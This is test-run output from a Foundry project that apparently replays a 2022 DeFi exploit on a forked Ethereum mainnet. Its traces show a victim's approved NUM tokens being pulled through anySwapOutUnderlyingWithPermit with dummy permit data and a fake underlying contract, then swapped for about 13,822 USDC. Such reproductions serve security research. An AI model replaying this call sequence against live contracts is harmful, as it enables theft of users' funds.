Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.18s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2022-11/NUM_exp.sol:28:5:
   |
28 |     IERC20 USDC = IERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:3064:1:
     |
3064 | interface USDC {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2022-11/NUM_exp.sol:29:5:
   |
29 |     IERC20 WETH = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-11/NUM_exp.sol:64:27:
   |
64 |     function depositVault(uint256 amount, address to) external returns (uint256) {
   |                           ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-11/NUM_exp.sol:64:43:
   |
64 |     function depositVault(uint256 amount, address to) external returns (uint256) {
   |                                           ^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-11/NUM_exp.sol:68:19:
   |
68 |     function burn(address from, uint256 amount) external returns (bool) {
   |                   ^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-11/NUM_exp.sol:68:33:
   |
68 |     function burn(address from, uint256 amount) external returns (bool) {
   |                                 ^^^^^^^^^^^^^^

Warning (2018): Function state mutability can be restricted to view
  --> src/test/2022-11/NUM_exp.sol:60:5:
   |
60 |     function underlying() external returns (address) {
   |     ^ (Relevant source part starts here and spans across multiple lines).

Warning (2018): Function state mutability can be restricted to view
  --> src/test/2022-11/NUM_exp.sol:64:5:
   |
64 |     function depositVault(uint256 amount, address to) external returns (uint256) {
   |     ^ (Relevant source part starts here and spans across multiple lines).

Warning (2018): Function state mutability can be restricted to pure
  --> src/test/2022-11/NUM_exp.sol:68:5:
   |
68 |     function burn(address from, uint256 amount) external returns (bool) {
   |     ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 740.01ms (1.76ms CPU time)

Ran 1 test for src/test/2022-11/NUM_exp.sol:ContractTest
[PASS] testExploit() (gas: 279176)
Logs:
  [End] Attacker USDC balance after exploit: 13822.280101

Traces:
  [5779] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 16029969 [1.602e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [326576] ContractTest::testExploit()
    ├─ [10049] 0x3496B523e5C00a4b4150D6721320CdDb234c3079::balanceOf(0x78AC2624a2Cd193E8dEfE9F39A9528e8bd4a368c) [staticcall]
    │   ├─ [2770] 0xd39015041518064743D955cF550C611b0b68888c::balanceOf(0x78AC2624a2Cd193E8dEfE9F39A9528e8bd4a368c) [delegatecall]
    │   │   └─ ← [Return] 557754450001980916242788 [5.577e23]
    │   └─ ← [Return] 557754450001980916242788 [5.577e23]
    ├─ [46330] 0x765277EebeCA2e31912C9946eAe1021199B39C61::anySwapOutUnderlyingWithPermit(0x78AC2624a2Cd193E8dEfE9F39A9528e8bd4a368c, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 557754450001980916242788 [5.577e23], 1669173599 [1.669e9], 0, 0x3078000000000000000000000000000000000000000000000000000000000000, 0x3078000000000000000000000000000000000000000000000000000000000000, 12)
    │   ├─ [633] ContractTest::underlying() [staticcall]
    │   │   └─ ← [Return] 0x3496B523e5C00a4b4150D6721320CdDb234c3079
    │   ├─ [1507] 0x3496B523e5C00a4b4150D6721320CdDb234c3079::permit(0x78AC2624a2Cd193E8dEfE9F39A9528e8bd4a368c, 0x765277EebeCA2e31912C9946eAe1021199B39C61, 557754450001980916242788 [5.577e23], 1669173599 [1.669e9], 0, 0x3078000000000000000000000000000000000000000000000000000000000000, 0x3078000000000000000000000000000000000000000000000000000000000000)
    │   │   ├─ [698] 0xd39015041518064743D955cF550C611b0b68888c::permit(0x78AC2624a2Cd193E8dEfE9F39A9528e8bd4a368c, 0x765277EebeCA2e31912C9946eAe1021199B39C61, 557754450001980916242788 [5.577e23], 1669173599 [1.669e9], 0, 0x3078000000000000000000000000000000000000000000000000000000000000, 0x3078000000000000000000000000000000000000000000000000000000000000) [delegatecall]
    │   │   │   └─ ← [Stop]
    │   │   └─ ← [Return]
    │   ├─ [35089] 0x3496B523e5C00a4b4150D6721320CdDb234c3079::transferFrom(0x78AC2624a2Cd193E8dEfE9F39A9528e8bd4a368c, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 557754450001980916242788 [5.577e23])
    │   │   ├─ [34301] 0xd39015041518064743D955cF550C611b0b68888c::transferFrom(0x78AC2624a2Cd193E8dEfE9F39A9528e8bd4a368c, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 557754450001980916242788 [5.577e23]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: 0x78AC2624a2Cd193E8dEfE9F39A9528e8bd4a368c, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 557754450001980916242788 [5.577e23])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x55a0057624dad632c54be5e05c0dfb5b296e8972634a42e45cde29b984506076: 0xffffffffffffffffffffffffffffffffffffffffffffeacd839009d3ff0bffff → 0xffffffffffffffffffffffffffffffffffffffffffff74b195a81ac0bba7e69b
    │   │   │   │   @ 0x3241fac9bfdea9ad94cb8e095865771b0616911ada53f807fc71c9ebd72ab361: 0x00000000000000000000000000000000000000000000761bede7ef1343641964 → 0
    │   │   │   │   @ 0xf85b56951f6ca259eb015e4162809ffc1dd28bc06ffa5a7aa716f2780313bdca: 0 → 0x00000000000000000000000000000000000000000000761bede7ef1343641964
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ [955] ContractTest::depositVault(557754450001980916242788 [5.577e23], 0x78AC2624a2Cd193E8dEfE9F39A9528e8bd4a368c)
    │   │   └─ ← [Return] 557754450001980916242788 [5.577e23]
    │   ├─ [862] ContractTest::burn(0x78AC2624a2Cd193E8dEfE9F39A9528e8bd4a368c, 557754450001980916242788 [5.577e23])
    │   │   └─ ← [Return] true
    │   ├─ emit LogAnySwapOut(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 0x78AC2624a2Cd193E8dEfE9F39A9528e8bd4a368c, param2: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param3: 557754450001980916242788 [5.577e23], param4: 1, param5: 12)
    │   └─ ← [Stop]
    ├─ [25340] 0x3496B523e5C00a4b4150D6721320CdDb234c3079::approve(0x68b3465833fb72A70ecDF485E0e4C7bD8665Fc45, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ [24558] 0xd39015041518064743D955cF550C611b0b68888c::approve(0x68b3465833fb72A70ecDF485E0e4C7bD8665Fc45, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]) [delegatecall]
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x68b3465833fb72A70ecDF485E0e4C7bD8665Fc45, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0xbe9b2f29f3ef54f66631e61c78193ea1a101d285ea6ebb8a05c5b2f856887fba: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   └─ ← [Return] true
    │   └─ ← [Return] true
    ├─ [24420] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::approve(0x68b3465833fb72A70ecDF485E0e4C7bD8665Fc45, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x68b3465833fb72A70ecDF485E0e4C7bD8665Fc45, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x50901a286cf95c053ce195f830759692344caa536c175b0afa4422397b8b26d5: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [1549] 0x3496B523e5C00a4b4150D6721320CdDb234c3079::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [770] 0xd39015041518064743D955cF550C611b0b68888c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 557754450001980916242788 [5.577e23]
    │   └─ ← [Return] 557754450001980916242788 [5.577e23]
    ├─ [46727] 0x3496B523e5C00a4b4150D6721320CdDb234c3079::transfer(0x68b3465833fb72A70ecDF485E0e4C7bD8665Fc45, 557754450001980916242788 [5.577e23])
    │   ├─ [45945] 0xd39015041518064743D955cF550C611b0b68888c::transfer(0x68b3465833fb72A70ecDF485E0e4C7bD8665Fc45, 557754450001980916242788 [5.577e23]) [delegatecall]
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x68b3465833fb72A70ecDF485E0e4C7bD8665Fc45, value: 557754450001980916242788 [5.577e23])
    │   │   ├─ [204] 0x68b3465833fb72A70ecDF485E0e4C7bD8665Fc45::onTokenTransfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 557754450001980916242788 [5.577e23], 0x)
    │   │   │   └─ ← [Revert] EvmError: Revert
    │   │   ├─ emit ContractFallbackCallFailed(: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 0x68b3465833fb72A70ecDF485E0e4C7bD8665Fc45, : 557754450001980916242788 [5.577e23])
    │   │   ├─  storage changes:
    │   │   │   @ 309: 0x0000000000000000000000000000000000000000000000000000000000f4952b → 0x0000000000000000000000000000000000000000000000000000000000f49911
    │   │   │   @ 0xf85b56951f6ca259eb015e4162809ffc1dd28bc06ffa5a7aa716f2780313bdca: 0x00000000000000000000000000000000000000000000761bede7ef1343641964 → 0
    │   │   │   @ 0x498402c349f9553908fbe44064a0916b209020a5e8f4a852d2fcdbd8562d7ee0: 0 → 0x00000000000000000000000000000000000000000000761bede7ef1343641964
    │   │   └─ ← [Return] true
    │   └─ ← [Return] true
    ├─ [115100] 0x68b3465833fb72A70ecDF485E0e4C7bD8665Fc45::swapExactTokensForTokens(0, 0, [0x3496B523e5C00a4b4150D6721320CdDb234c3079, 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─ [1549] 0x3496B523e5C00a4b4150D6721320CdDb234c3079::balanceOf(0x68b3465833fb72A70ecDF485E0e4C7bD8665Fc45) [staticcall]
    │   │   ├─ [770] 0xd39015041518064743D955cF550C611b0b68888c::balanceOf(0x68b3465833fb72A70ecDF485E0e4C7bD8665Fc45) [delegatecall]
    │   │   │   └─ ← [Return] 557754450001980916242788 [5.577e23]
    │   │   └─ ← [Return] 557754450001980916242788 [5.577e23]
    │   ├─ [16560] 0x3496B523e5C00a4b4150D6721320CdDb234c3079::transfer(0x22527f92f43Dc8bEa6387CE40B87EbAa21f51Df3, 557754450001980916242788 [5.577e23])
    │   │   ├─ [15778] 0xd39015041518064743D955cF550C611b0b68888c::transfer(0x22527f92f43Dc8bEa6387CE40B87EbAa21f51Df3, 557754450001980916242788 [5.577e23]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: 0x68b3465833fb72A70ecDF485E0e4C7bD8665Fc45, to: 0x22527f92f43Dc8bEa6387CE40B87EbAa21f51Df3, value: 557754450001980916242788 [5.577e23])
    │   │   │   ├─ [248] 0x22527f92f43Dc8bEa6387CE40B87EbAa21f51Df3::onTokenTransfer(0x68b3465833fb72A70ecDF485E0e4C7bD8665Fc45, 557754450001980916242788 [5.577e23], 0x)
    │   │   │   │   └─ ← [Revert] EvmError: Revert
    │   │   │   ├─ emit ContractFallbackCallFailed(: 0x68b3465833fb72A70ecDF485E0e4C7bD8665Fc45, : 0x22527f92f43Dc8bEa6387CE40B87EbAa21f51Df3, : 557754450001980916242788 [5.577e23])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x498402c349f9553908fbe44064a0916b209020a5e8f4a852d2fcdbd8562d7ee0: 0x00000000000000000000000000000000000000000000761bede7ef1343641964 → 0
    │   │   │   │   @ 0x04e0ef114b2de950f3b116ad88760fb08428c291f29e797ebb342faa7b69da3f: 0x00000000000000000000000000000000000000000003b2fa4dd76fc928d2f06f → 0x0000000000000000000000000000000000000000000429163bbf5edc6c3709d3
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ [9815] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   ├─ [2529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   └─ ← [Return] 0
    │   │   └─ ← [Return] 0
    │   ├─ [2504] 0x22527f92f43Dc8bEa6387CE40B87EbAa21f51Df3::getReserves() [staticcall]
    │   │   └─ ← [Return] 4471975987887882437324911 [4.471e24], 124980337944 [1.249e11], 1669161515 [1.669e9]
    │   ├─ [1549] 0x3496B523e5C00a4b4150D6721320CdDb234c3079::balanceOf(0x22527f92f43Dc8bEa6387CE40B87EbAa21f51Df3) [staticcall]
    │   │   ├─ [770] 0xd39015041518064743D955cF550C611b0b68888c::balanceOf(0x22527f92f43Dc8bEa6387CE40B87EbAa21f51Df3) [delegatecall]
    │   │   │   └─ ← [Return] 5029730437889863353567699 [5.029e24]
    │   │   └─ ← [Return] 5029730437889863353567699 [5.029e24]
    │   ├─ [69704] 0x22527f92f43Dc8bEa6387CE40B87EbAa21f51Df3::swap(0, 13822280101 [1.382e10], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [35517] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 13822280101 [1.382e10])
    │   │   │   ├─ [34728] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 13822280101 [1.382e10]) [delegatecall]
    │   │   │   │   ├─ emit Transfer(from: 0x22527f92f43Dc8bEa6387CE40B87EbAa21f51Df3, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 13822280101 [1.382e10])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0 → 0x0000000000000000000000000000000000000000000000000000000337df41a5
    │   │   │   │   │   @ 0x00be13b8d980d3f60cf6108945e7a7454fa868719d7021abbe404c13ab1aefc0: 0x0000000000000000000000000000000000000000000000000000001d19689d18 → 0x00000000000000000000000000000000000000000000000000000019e1895b73
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─ [1549] 0x3496B523e5C00a4b4150D6721320CdDb234c3079::balanceOf(0x22527f92f43Dc8bEa6387CE40B87EbAa21f51Df3) [staticcall]
    │   │   │   ├─ [770] 0xd39015041518064743D955cF550C611b0b68888c::balanceOf(0x22527f92f43Dc8bEa6387CE40B87EbAa21f51Df3) [delegatecall]
    │   │   │   │   └─ ← [Return] 5029730437889863353567699 [5.029e24]
    │   │   │   └─ ← [Return] 5029730437889863353567699 [5.029e24]
    │   │   ├─ [1315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(0x22527f92f43Dc8bEa6387CE40B87EbAa21f51Df3) [staticcall]
    │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0x22527f92f43Dc8bEa6387CE40B87EbAa21f51Df3) [delegatecall]
    │   │   │   │   └─ ← [Return] 111158057843 [1.111e11]
    │   │   │   └─ ← [Return] 111158057843 [1.111e11]
    │   │   ├─ emit Sync(reserve0: 5029730437889863353567699 [5.029e24], reserve1: 111158057843 [1.111e11])
    │   │   ├─ emit Swap(sender: 0x68b3465833fb72A70ecDF485E0e4C7bD8665Fc45, amount0In: 557754450001980916242788 [5.577e23], amount1In: 0, amount0Out: 0, amount1Out: 13822280101 [1.382e10], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 8: 0x637d622b0000000000000000001d19689d1800000003b2fa4dd76fc928d2f06f → 0x637d912300000000000000000019e1895b730000000429163bbf5edc6c3709d3
    │   │   │   @ 9: 0x0000000000000000000000000000000000000000b2412ad4e057aaeee3e9568f → 0x0000000000000000000000000000000000000000b2429c4fc6b09a93bbd8fe97
    │   │   │   @ 10: 0x00000000000000000011b0dbabad586ecf8bb72c3cab296acd41a88736e33844 → 0x00000000000000000011b6d42d078b9f8cca30d0f8bae85ab914e22a0242dc64
    │   │   └─ ← [Stop]
    │   ├─ [1315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   └─ ← [Return] 13822280101 [1.382e10]
    │   │   └─ ← [Return] 13822280101 [1.382e10]
    │   └─ ← [Return] 13822280101 [1.382e10]
    ├─ [1315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 13822280101 [1.382e10]
    │   └─ ← [Return] 13822280101 [1.382e10]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker USDC balance after exploit", val: 13822280101 [1.382e10], decimals: 6)
    ├─  storage changes:
    │   @ 0x50901a286cf95c053ce195f830759692344caa536c175b0afa4422397b8b26d5: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   @ 37: 0 → 0x00000000000000000000000000000000000000000000761bede7ef1343641964
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 22.07s (19.61s CPU time)

Ran 2 test suites in 22.87s (22.81s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
